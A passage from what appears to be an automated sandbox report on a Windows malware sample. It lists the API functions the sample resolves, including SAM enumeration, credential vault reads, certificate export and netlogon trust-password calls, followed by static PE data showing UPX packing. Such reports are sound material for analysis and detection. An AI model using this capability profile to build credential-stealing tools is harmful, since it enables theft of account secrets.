- "crypt32.dll.CertSetCertificateContextProperty",
- "crypt32.dll.PFXExportCertStoreEx",
- "crypt32.dll.CryptUnprotectData",
- "crypt32.dll.CryptBinaryToStringW",
- "crypt32.dll.CryptStringToBinaryW",
- "crypt32.dll.CryptProtectData",
- "crypt32.dll.CryptExportPublicKeyInfo",
- "crypt32.dll.CryptAcquireCertificatePrivateKey",
- "crypt32.dll.CertNameToStrW",
- "crypt32.dll.CertGetCertificateContextProperty",
- "crypt32.dll.CertAddCertificateContextToStore",
- "crypt32.dll.CertFindCertificateInStore",
- "cryptdll.dll.CDLocateCSystem",
- "cryptdll.dll.MD5Final",
- "cryptdll.dll.MD5Init",
- "cryptdll.dll.CDLocateCheckSum",
- "cryptdll.dll.CDGenerateRandomBits",
- "cryptdll.dll.MD5Update",
- "fltlib.dll.FilterFindFirst",
- "fltlib.dll.FilterFindNext",
- "hid.dll.HidD_GetPreparsedData",
- "hid.dll.HidD_FreePreparsedData",
- "hid.dll.HidP_GetCaps",
- "hid.dll.HidD_GetFeature",
- "hid.dll.HidD_GetAttributes",
- "hid.dll.HidD_GetHidGuid",
- "hid.dll.HidD_SetFeature",
- "msasn1.dll.ASN1_CreateModule",
- "msasn1.dll.ASN1_CloseEncoder",
- "msasn1.dll.ASN1_CreateDecoder",
- "msasn1.dll.ASN1_FreeEncoded",
- "msasn1.dll.ASN1_CloseModule",
- "msasn1.dll.ASN1_CreateEncoder",
- "msasn1.dll.ASN1_CloseDecoder",
- "msasn1.dll.ASN1BERDotVal2Eoid",
- "msvcrt.dll.isdigit",
- "msvcrt.dll.isspace",
- "msvcrt.dll.__set_app_type",
- "msvcrt.dll.mbtowc",
- "msvcrt.dll.__mb_cur_max",
- "msvcrt.dll.isleadbyte",
- "msvcrt.dll.isxdigit",
- "msvcrt.dll.localeconv",
- "msvcrt.dll._snprintf",
- "msvcrt.dll._itoa",
- "msvcrt.dll.calloc",
- "msvcrt.dll.wctomb",
- "msvcrt.dll.ferror",
- "msvcrt.dll.iswctype",
- "msvcrt.dll.wcstombs",
- "msvcrt.dll.?terminate@@YAXXZ",
- "msvcrt.dll.__badioinfo",
- "msvcrt.dll.__pioinfo",
- "msvcrt.dll._read",
- "msvcrt.dll._lseeki64",
- "msvcrt.dll._write",
- "msvcrt.dll._isatty",
- "msvcrt.dll.ungetc",
- "msvcrt.dll._fmode",
- "msvcrt.dll.getchar",
- "msvcrt.dll._wpgmptr",
- "msvcrt.dll._commode",
- "msvcrt.dll.__setusermatherr",
- "msvcrt.dll._amsg_exit",
- "msvcrt.dll._initterm",
- "msvcrt.dll.exit",
- "msvcrt.dll._cexit",
- "msvcrt.dll._exit",
- "msvcrt.dll._XcptFilter",
- "msvcrt.dll.__wgetmainargs",
- "msvcrt.dll.__C_specific_handler",
- "msvcrt.dll.fgetws",
- "msvcrt.dll.memset",
- "msvcrt.dll.memcpy",
- "msvcrt.dll._errno",
- "msvcrt.dll.free",
- "msvcrt.dll._wcsdup",
- "msvcrt.dll.vfwprintf",
- "msvcrt.dll.fflush",
- "msvcrt.dll._wfopen",
- "msvcrt.dll.wprintf",
- "msvcrt.dll._fileno",
- "msvcrt.dll._iob",
- "msvcrt.dll.vwprintf",
- "msvcrt.dll._setmode",
- "msvcrt.dll.fclose",
- "msvcrt.dll.gmtime",
- "msvcrt.dll.malloc",
- "msvcrt.dll._msize",
- "msvcrt.dll.strftime",
- "msvcrt.dll.realloc",
- "netapi32.dll.NetServerGetInfo",
- "netapi32.dll.NetStatisticsGet",
- "netapi32.dll.NetShareEnum",
- "netapi32.dll.NetSessionEnum",
- "netapi32.dll.DsGetDcNameW",
- "netapi32.dll.NetApiBufferFree",
- "netapi32.dll.NetRemoteTOD",
- "netapi32.dll.NetWkstaUserEnum",
- "netapi32.dll.I_NetServerTrustPasswordsGet",
- "netapi32.dll.I_NetServerReqChallenge",
- "netapi32.dll.I_NetServerAuthenticate2",
- "ntdll.dll.wcsncmp",
- "ntdll.dll._wcstoui64",
- "ntdll.dll.wcstol",
- "ntdll.dll.wcstoul",
- "ntdll.dll.memmove",
- "ntdll.dll.wcsstr",
- "ntdll.dll._wcsnicmp",
- "ntdll.dll.strtoul",
- "ntdll.dll.wcschr",
- "ntdll.dll.wcsrchr",
- "ntdll.dll._stricmp",
- "ntdll.dll._vscwprintf",
- "ntdll.dll._wcsicmp",
- "ntdll.dll.strrchr",
- "ntdll.dll._vsnprintf",
- "ntdll.dll.memcmp",
- "ntdll.dll.RtlUnicodeStringToAnsiString",
- "ntdll.dll.RtlFreeAnsiString",
- "ntdll.dll.RtlDowncaseUnicodeString",
- "ntdll.dll.RtlFreeUnicodeString",
- "ntdll.dll.RtlInitUnicodeString",
- "ntdll.dll.RtlEqualUnicodeString",
- "ntdll.dll.NtQueryObject",
- "ntdll.dll.RtlCompressBuffer",
- "ntdll.dll.RtlGetCompressionWorkSpaceSize",
- "ntdll.dll.NtQuerySystemInformation",
- "ntdll.dll.RtlGetCurrentPeb",
- "ntdll.dll.NtQueryInformationProcess",
- "ntdll.dll.RtlCreateUserThread",
- "ntdll.dll.RtlGUIDFromString",
- "ntdll.dll.RtlStringFromGUID",
- "ntdll.dll.NtCompareTokens",
- "ntdll.dll.RtlGetNtVersionNumbers",
- "ntdll.dll.RtlEqualString",
- "ntdll.dll.RtlUpcaseUnicodeString",
- "ntdll.dll.RtlAppendUnicodeStringToString",
- "ntdll.dll.RtlAnsiStringToUnicodeString",
- "ntdll.dll.RtlFreeOemString",
- "ntdll.dll.RtlUpcaseUnicodeStringToOemString",
- "ntdll.dll.NtResumeProcess",
- "ntdll.dll.NtSuspendProcess",
- "ntdll.dll.NtTerminateProcess",
- "ntdll.dll.NtQuerySystemEnvironmentValueEx",
- "ntdll.dll.NtSetSystemEnvironmentValueEx",
- "ntdll.dll.NtEnumerateSystemEnvironmentValuesEx",
- "ntdll.dll.RtlIpv4AddressToStringW",
- "ntdll.dll.RtlIpv6AddressToStringW",
- "ntdll.dll.towupper",
- "ntdll.dll.__chkstk",
- "rpcrt4.dll.RpcMgmtEpEltInqNextW",
- "rpcrt4.dll.RpcMgmtEpEltInqBegin",
- "rpcrt4.dll.I_RpcGetCurrentCallHandle",
- "rpcrt4.dll.NdrClientCall2",
- "rpcrt4.dll.RpcMgmtEpEltInqDone",
- "rpcrt4.dll.RpcBindingFromStringBindingW",
- "rpcrt4.dll.RpcStringBindingComposeW",
- "rpcrt4.dll.MesEncodeIncrementalHandleCreate",
- "rpcrt4.dll.RpcBindingSetAuthInfoExW",
- "rpcrt4.dll.RpcBindingInqAuthClientW",
- "rpcrt4.dll.RpcBindingSetOption",
- "rpcrt4.dll.RpcImpersonateClient",
- "rpcrt4.dll.RpcStringFreeW",
- "rpcrt4.dll.RpcRevertToSelf",
- "rpcrt4.dll.MesDecodeIncrementalHandleCreate",
- "rpcrt4.dll.MesHandleFree",
- "rpcrt4.dll.MesIncrementalHandleReset",
- "rpcrt4.dll.NdrMesTypeDecode2",
- "rpcrt4.dll.NdrMesTypeAlignSize2",
- "rpcrt4.dll.NdrMesTypeFree2",
- "rpcrt4.dll.NdrMesTypeEncode2",
- "rpcrt4.dll.RpcServerUnregisterIfEx",
- "rpcrt4.dll.I_RpcBindingInqSecurityContext",
- "rpcrt4.dll.RpcServerInqBindings",
- "rpcrt4.dll.RpcServerListen",
- "rpcrt4.dll.RpcMgmtWaitServerListen",
- "rpcrt4.dll.RpcEpRegisterW",
- "rpcrt4.dll.RpcMgmtStopServerListening",
- "rpcrt4.dll.RpcBindingToStringBindingW",
- "rpcrt4.dll.RpcServerRegisterIf2",
- "rpcrt4.dll.RpcServerRegisterAuthInfoW",
- "rpcrt4.dll.RpcBindingVectorFree",
- "rpcrt4.dll.UuidToStringW",
- "rpcrt4.dll.RpcServerUseProtseqEpW",
- "rpcrt4.dll.RpcEpUnregister",
- "rpcrt4.dll.NdrServerCall2",
- "rpcrt4.dll.RpcEpResolveBinding",
- "rpcrt4.dll.UuidCreate",
- "samlib.dll.SamGetGroupsForUser",
- "samlib.dll.SamEnumerateGroupsInDomain",
- "samlib.dll.SamiChangePasswordUser",
- "samlib.dll.SamGetMembersInGroup",
- "samlib.dll.SamSetInformationUser",
- "samlib.dll.SamRidToSid",
- "samlib.dll.SamGetMembersInAlias",
- "samlib.dll.SamEnumerateAliasesInDomain",
- "samlib.dll.SamGetAliasMembership",
- "samlib.dll.SamOpenGroup",
- "samlib.dll.SamOpenAlias",
- "samlib.dll.SamQueryInformationUser",
- "samlib.dll.SamCloseHandle",
- "samlib.dll.SamEnumerateDomainsInSamServer",
- "samlib.dll.SamFreeMemory",
- "samlib.dll.SamEnumerateUsersInDomain",
- "samlib.dll.SamOpenUser",
- "samlib.dll.SamLookupDomainInSamServer",
- "samlib.dll.SamLookupNamesInDomain",
- "samlib.dll.SamLookupIdsInDomain",
- "samlib.dll.SamOpenDomain",
- "samlib.dll.SamConnect",
- "secur32.dll.FreeContextBuffer",
- "secur32.dll.LsaLookupAuthenticationPackage",
- "secur32.dll.LsaConnectUntrusted",
- "secur32.dll.LsaFreeReturnBuffer",
- "secur32.dll.LsaDeregisterLogonProcess",
- "secur32.dll.DeleteSecurityContext",
- "secur32.dll.LsaCallAuthenticationPackage",
- "secur32.dll.FreeCredentialsHandle",
- "secur32.dll.AcquireCredentialsHandleW",
- "secur32.dll.InitializeSecurityContextW",
- "secur32.dll.QueryContextAttributesW",
- "secur32.dll.EnumerateSecurityPackagesW",
- "setupapi.dll.SetupDiGetDeviceInterfaceDetailW",
- "setupapi.dll.SetupDiEnumDeviceInterfaces",
- "setupapi.dll.SetupDiGetClassDevsW",
- "setupapi.dll.SetupDiDestroyDeviceInfoList",
- "shell32.dll.CommandLineToArgvW",
- "shlwapi.dll.PathIsDirectoryW",
- "shlwapi.dll.PathCanonicalizeW",
- "shlwapi.dll.PathCombineW",
- "shlwapi.dll.PathFindFileNameW",
- "shlwapi.dll.PathIsRelativeW",
- "user32.dll.IsCharAlphaNumericW",
- "user32.dll.GetKeyboardLayout",
- "user32.dll.DispatchMessageW",
- "user32.dll.DefWindowProcW",
- "user32.dll.SetClipboardViewer",
- "user32.dll.SendMessageW",
- "user32.dll.GetClipboardSequenceNumber",
- "user32.dll.CreateWindowExW",
- "user32.dll.ChangeClipboardChain",
- "user32.dll.RegisterClassExW",
- "user32.dll.EnumClipboardFormats",
- "user32.dll.PostMessageW",
- "user32.dll.UnregisterClassW",
- "user32.dll.GetMessageW",
- "userenv.dll.CreateEnvironmentBlock",
- "userenv.dll.DestroyEnvironmentBlock",
- "version.dll.GetFileVersionInfoSizeW",
- "version.dll.VerQueryValueW",
- "version.dll.GetFileVersionInfoW",
- "winscard.dll.SCardFreeMemory",
- "winscard.dll.SCardListCardsW",
- "winscard.dll.SCardControl",
- "winscard.dll.SCardGetCardTypeProviderNameW",
- "winscard.dll.SCardReleaseContext",
- "winscard.dll.SCardListReadersW",
- "winscard.dll.SCardEstablishContext",
- "winscard.dll.SCardConnectW",
- "winscard.dll.SCardTransmit",
- "winscard.dll.SCardDisconnect",
- "winscard.dll.SCardGetAttrib",
- "winsta.dll.WinStationCloseServer",
- "winsta.dll.WinStationOpenServerW",
- "winsta.dll.WinStationFreeMemory",
- "winsta.dll.WinStationConnectW",
- "winsta.dll.WinStationQueryInformationW",
- "winsta.dll.WinStationEnumerateW",
- "wldap32.dll.#140",
- "wldap32.dll.#122",
- "wldap32.dll.#14",
- "wldap32.dll.#88",
- "wldap32.dll.#133",
- "wldap32.dll.#142",
- "wldap32.dll.#77",
- "wldap32.dll.#27",
- "wldap32.dll.#13",
- "wldap32.dll.#147",
- "wldap32.dll.#96",
- "wldap32.dll.#208",
- "wldap32.dll.#224",
- "wldap32.dll.#36",
- "wldap32.dll.#79",
- "wldap32.dll.#157",
- "wldap32.dll.#26",
- "wldap32.dll.#41",
- "wldap32.dll.#127",
- "wldap32.dll.#73",
- "wldap32.dll.#301",
- "wldap32.dll.#304",
- "wldap32.dll.#309",
- "wldap32.dll.#54",
- "wldap32.dll.#310",
- "wldap32.dll.#69",
- "wldap32.dll.#139",
- "wldap32.dll.#97",
- "wldap32.dll.#223",
- "wldap32.dll.#12",
- "wldap32.dll.#145",
- "wldap32.dll.#113",
- "wldap32.dll.#167",
- "wldap32.dll.#203",
- "rsaenh.dll.CPExportKey",
- "vaultcli.dll.VaultEnumerateItemTypes",
- "vaultcli.dll.VaultEnumerateVaults",
- "vaultcli.dll.VaultOpenVault",
- "vaultcli.dll.VaultGetInformation",
- "vaultcli.dll.VaultEnumerateItems",
- "vaultcli.dll.VaultCloseVault",
- "vaultcli.dll.VaultFree",
- "vaultcli.dll.VaultGetItem",
- "wintrust.dll.WinVerifyTrust",
- "bcrypt.dll.BCryptOpenAlgorithmProvider",
- "bcrypt.dll.BCryptSetProperty",
- "bcrypt.dll.BCryptGetProperty",
- "bcrypt.dll.BCryptGenerateSymmetricKey",
- "bcrypt.dll.BCryptDecrypt",
- "cryptsp.dll.CryptImportKey",
- "cryptsp.dll.CryptSetHashParam",
- "cryptsp.dll.CryptDestroyKey",
- "bcrypt.dll.BCryptCloseAlgorithmProvider",
- "bcrypt.dll.BCryptDestroyKey",
- "sspicli.dll.GetUserNameExW",
- "advapi32.dll.GetUserNameW",
- "sechost.dll.ConvertSidToStringSidW",
- "xmllite.dll.CreateXmlWriter",
- "xmllite.dll.CreateXmlWriterOutputWithEncodingName",
- "sechost.dll.ChangeServiceConfigW",
- "kernel32.dll.GetThreadContext",
- "kernel32.dll.OpenThread",
- "kernel32.dll.DebugActiveProcess",
- "kernel32.dll.DebugActiveProcessStop",
- "kernel32.dll.ContinueDebugEvent",
- "kernel32.dll.WaitForDebugEvent",
- "kernel32.dll.SystemTimeToTzSpecificLocalTime",
- "kernel32.dll.Process32FirstW",
- "kernel32.dll.Process32NextW",
- "kernel32.dll.DebugBreak",
- "kernel32.dll.SetFilePointerEx",
- "kernel32.dll.CreateSemaphoreW",
- "kernel32.dll.GetConsoleCP",
- "kernel32.dll.LoadLibraryExW",
- "kernel32.dll.GetStartupInfoW",
- "kernel32.dll.InitializeCriticalSectionAndSpinCount",
- "kernel32.dll.GetModuleFileNameW",
- "kernel32.dll.GetCommandLineW",
- "kernel32.dll.WriteConsoleW",
- "kernel32.dll.ReadConsoleW",
- "kernel32.dll.IsValidCodePage",
- "kernel32.dll.GetConsoleMode",
- "kernel32.dll.ReadConsoleInputA",
- "kernel32.dll.SetConsoleMode",
- "kernel32.dll.GetModuleHandleExW",
- "kernel32.dll.RtlPcToFileHeader",
- "kernel32.dll.RtlUnwindEx",
- "advapi32.dll.EnumServicesStatusExW",
- "advapi32.dll.AdjustTokenPrivileges",
- "advapi32.dll.RegDeleteValueW",
- "advapi32.dll.RegDeleteKeyW",
- "advapi32.dll.RegCreateKeyW",
- "comdlg32.dll.PrintDlgW",
- "gdi32.dll.StartDocW",
- "ole32.dll.CoAllowSetForegroundWindow",
- "pdh.dll.PdhOpenQueryW",
- "pdh.dll.PdhAddCounterW",
- "pdh.dll.PdhCollectQueryData",
- "pdh.dll.PdhGetFormattedCounterValue",
- "psapi.dll.EnumProcessModules",
- "psapi.dll.GetProcessImageFileNameW",
- "psapi.dll.GetModuleBaseNameW",
- "user32.dll.SetWindowTextW",
- "user32.dll.wsprintfW",
- "user32.dll.IsHungAppWindow",
- "user32.dll.EnumWindows",
- "user32.dll.DialogBoxIndirectParamW",
- "user32.dll.LoadCursorW",
- "kernel32.dll.InitializeCriticalSectionEx",
- "kernel32.dll.CreateEventExW",
- "kernel32.dll.CreateSemaphoreExW",
- "kernel32.dll.SetThreadStackGuarantee",
- "kernel32.dll.CreateThreadpoolTimer",
- "kernel32.dll.SetThreadpoolTimer",
- "kernel32.dll.WaitForThreadpoolTimerCallbacks",
- "kernel32.dll.CloseThreadpoolTimer",
- "kernel32.dll.CreateThreadpoolWait",
- "kernel32.dll.SetThreadpoolWait",
- "kernel32.dll.CloseThreadpoolWait",
- "kernel32.dll.FlushProcessWriteBuffers",
- "kernel32.dll.FreeLibraryWhenCallbackReturns",
- "kernel32.dll.GetCurrentProcessorNumber",
- "kernel32.dll.GetLogicalProcessorInformation",
- "kernel32.dll.CreateSymbolicLinkW",
- "kernel32.dll.EnumSystemLocalesEx",
- "kernel32.dll.CompareStringEx",
- "kernel32.dll.GetDateFormatEx",
- "kernel32.dll.GetLocaleInfoEx",
- "kernel32.dll.GetTimeFormatEx",
- "kernel32.dll.GetUserDefaultLocaleName",
- "kernel32.dll.IsValidLocaleName",
- "kernel32.dll.LCMapStringEx",
- "kernel32.dll.GetTickCount64",
- "dbghelp.dll.MiniDumpWriteDump",
- "dbghelp.dll.ImagehlpApiVersion",
- "dbghelp.dll.EnumerateLoadedModulesEx",
- "ntdll.dll.RtlCreateProcessReflection",
- "ntdll.dll.RtlGetLastNtStatus",
- "kernel32.dll.K32GetModuleFileNameExW",
- "kernel32.dll.Thread32First",
- "kernel32.dll.Thread32Next",
- "kernel32.dll.Module32First",
- "kernel32.dll.Module32Next",
- "kernel32.dll.Module32FirstW",
- "kernel32.dll.Module32NextW",
- "kernel32.dll.GetLongPathNameA",
- "kernel32.dll.GetLongPathNameW",
- "kernel32.dll.GetProcessTimes",
- "ntdll.dll.NtOpenThread",
- "ntdll.dll.NtQueryInformationThread",
- "ntdll.dll.NtQueryMutant",
- "ntdll.dll.NtSystemDebugControl",
- "ntdll.dll.RtlFreeHeap",
- "ntdll.dll.RtlGetFunctionTableListHead",
- "ntdll.dll.RtlGetUnloadEventTrace",
- "ntdll.dll.RtlGetUnloadEventTraceEx",
- "ntdll.dll.NtOpenProcessToken",
- "ntdll.dll.NtOpenThreadToken",
- "ntdll.dll.NtQueryInformationToken",
- "ntdll.dll.NtClose",
- "powrprof.dll.CallNtPowerInformation",
- "kernel32.dll.ExitThread",
- "kernel32.dll.SetFileAttributesW",
- "kernel32.dll.FreeConsole",
- "kernel32.dll.GetConsoleWindow",
- "kernel32.dll.SetThreadAffinityMask",
- "kernel32.dll.SetThreadPriority",
- "kernel32.dll.FlushInstructionCache",
- "kernel32.dll.PostQueuedCompletionStatus",
- "kernel32.dll.GetQueuedCompletionStatusEx",
- "kernel32.dll.CreateIoCompletionPort",
- "kernel32.dll.SetConsoleTextAttribute",
- "kernel32.dll.RegisterWaitForSingleObject",
- "kernel32.dll.UnregisterWait",
- "kernel32.dll.GetConsoleCursorInfo",
- "kernel32.dll.QueueUserWorkItem",
- "kernel32.dll.SetConsoleCursorInfo",
- "kernel32.dll.ReadConsoleInputW",
- "kernel32.dll.WriteConsoleInputW",
- "kernel32.dll.FillConsoleOutputAttribute",
- "kernel32.dll.GetNumberOfConsoleInputEvents",
- "kernel32.dll.GetShortPathNameW",
- "kernel32.dll.ReadDirectoryChangesW",
- "kernel32.dll.QueryPerformanceFrequency",
- "kernel32.dll.IsValidLocale",
- "kernel32.dll.CreateDirectoryW",
- "kernel32.dll.RemoveDirectoryW",
- "kernel32.dll.GetFinalPathNameByHandleW",
- "kernel32.dll.SetFileTime",
- "kernel32.dll.ReOpenFile",
- "kernel32.dll.CreateHardLinkW",
- "kernel32.dll.MoveFileExW",
- "kernel32.dll.CopyFileW",
- "kernel32.dll.SleepConditionVariableCS",
- "kernel32.dll.WakeConditionVariable",
- "kernel32.dll.InitializeConditionVariable",
- "kernel32.dll.CancelIo",
- "kernel32.dll.SetFileCompletionNotificationModes",
- "kernel32.dll.SetNamedPipeHandleState",
- "kernel32.dll.CreateNamedPipeW",
- "kernel32.dll.PeekNamedPipe",
- "kernel32.dll.CancelSynchronousIo",
- "kernel32.dll.GetNamedPipeHandleStateA",
- "kernel32.dll.CancelIoEx",
- "kernel32.dll.SwitchToThread",
- "kernel32.dll.ConnectNamedPipe",
- "kernel32.dll.UnregisterWaitEx",
- "kernel32.dll.GetExitCodeProcess",
- "kernel32.dll.EnumSystemLocalesW",
- "kernel32.dll.FindFirstFileExA",
- "kernel32.dll.GetLocaleInfoW",
- "kernel32.dll.ResetEvent",
- "kernel32.dll.InitializeSListHead",
- "kernel32.dll.GetThreadTimes",
- "kernel32.dll.FreeLibraryAndExitThread",
- "advapi32.dll.CryptGenRandom",
- "advapi32.dll.LsaAddAccountRights",
- "user32.dll.MapVirtualKeyW",
- "ws2_32.dll.#112",
- "ws2_32.dll.WSARecvFrom",
- "ws2_32.dll.#22",
- "ws2_32.dll.#7",
- "ws2_32.dll.#111",
- "kernel32.dll.InitOnceExecuteOnce",
- "kernel32.dll.GetFileInformationByHandleEx",
- "kernel32.dll.SetFileInformationByHandle",
- "kernel32.dll.WakeAllConditionVariable",
- "kernel32.dll.InitializeSRWLock",
- "kernel32.dll.AcquireSRWLockExclusive",
- "kernel32.dll.TryAcquireSRWLockExclusive",
- "kernel32.dll.ReleaseSRWLockExclusive",
- "kernel32.dll.SleepConditionVariableSRW",
- "kernel32.dll.CreateThreadpoolWork",
- "kernel32.dll.SubmitThreadpoolWork",
- "kernel32.dll.CloseThreadpoolWork",
- "ntdll.dll.RtlGetVersion",
- "ntdll.dll.RtlNtStatusToDosError",
- "ntdll.dll.NtDeviceIoControlFile",
- "ntdll.dll.NtQueryInformationFile",
- "ntdll.dll.NtSetInformationFile",
- "ntdll.dll.NtQueryVolumeInformationFile",
- "ntdll.dll.NtQueryDirectoryFile",
- "user32.dll.SetWinEventHook",
- "wersvc.dll.ServiceMain",
- "wersvc.dll.SvchostPushServiceGlobals"
- ]
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "RegCloseKey",
- "address": "0xa9e154"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0xa9e15c"
- }
- ],
- "dll": "COMCTL32.dll"
- },
- {
- "imports": [
- {
- "name": "ChooseColorA",
- "address": "0xa9e164"
- }
- ],
- "dll": "comdlg32.dll"
- },
- {
- "imports": [
- {
- "name": "Escape",
- "address": "0xa9e16c"
- }
- ],
- "dll": "GDI32.dll"
- },
- {
- "imports": [
- {
- "name": "GetAdaptersInfo",
- "address": "0xa9e174"
- }
- ],
- "dll": "iphlpapi.dll"
- },
- {
- "imports": [
- {
- "name": "LoadLibraryA",
- "address": "0xa9e17c"
- },
- {
- "name": "ExitProcess",
- "address": "0xa9e180"
- },
- {
- "name": "GetProcAddress",
- "address": "0xa9e184"
- },
- {
- "name": "VirtualProtect",
- "address": "0xa9e188"
- }
- ],
- "dll": "KERNEL32.DLL"
- },
- {
- "imports": [
- {
- "name": "OleRun",
- "address": "0xa9e190"
- }
- ],
- "dll": "ole32.dll"
- },
- {
- "imports": [
- {
- "name": "VariantCopy",
- "address": "0xa9e198"
- }
- ],
- "dll": "OLEAUT32.dll"
- },
- {
- "imports": [
- {
- "name": "RasHangUpA",
- "address": "0xa9e1a0"
- }
- ],
- "dll": "RASAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "ShellExecuteA",
- "address": "0xa9e1a8"
- }
- ],
- "dll": "SHELL32.dll"
- },
- {
- "imports": [
- {
- "name": "GetDC",
- "address": "0xa9e1b0"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "VerQueryValueA",
- "address": "0xa9e1b8"
- }
- ],
- "dll": "VERSION.dll"
- },
- {
- "imports": [
- {
- "name": "InternetOpenA",
- "address": "0xa9e1c0"
- }
- ],
- "dll": "WININET.dll"
- },
- {
- "imports": [
- {
- "name": "waveOutOpen",
- "address": "0xa9e1c8"
- }
- ],
- "dll": "WINMM.dll"
- },
- {
- "imports": [
- {
- "name": "OpenPrinterA",
- "address": "0xa9e1d0"
- }
- ],
- "dll": "WINSPOOL.DRV"
- },
- {
- "imports": [
- {
- "name": "recvfrom",
- "address": "0xa9e1d8"
- }
- ],
- "dll": "WS2_32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x00539452",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x00a9d5b0",
- "timestamp": "2019-06-24 19:13:25",
- "osversion": "4.0",
- "sections": [
- {
- "name": "UPX0",
- "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00000000",
- "entropy": "0.00",
- "raw_address": "0x00000400",
- "virtual_size": "0x00170000",
- "characteristics_raw": "0xe0000080"
- },
- {
- "name": "UPX1",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00171000",
- "size_of_data": "0x0052c800",
- "entropy": "7.82",
- "raw_address": "0x00000400",
- "virtual_size": "0x0052d000",
- "characteristics_raw": "0xe0000040"
- },
- {
- "name": "UPX2",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0069e000",
- "size_of_data": "0x00000400",
- "entropy": "3.70",
- "raw_address": "0x0052cc00",
- "virtual_size": "0x00001000",
- "characteristics_raw": "0xc0000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0069e000",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x0000037c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "7e8fd41cc4af90fd0b2731fbcc919e1a",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 16,
- "versioninfo": []
- }
- }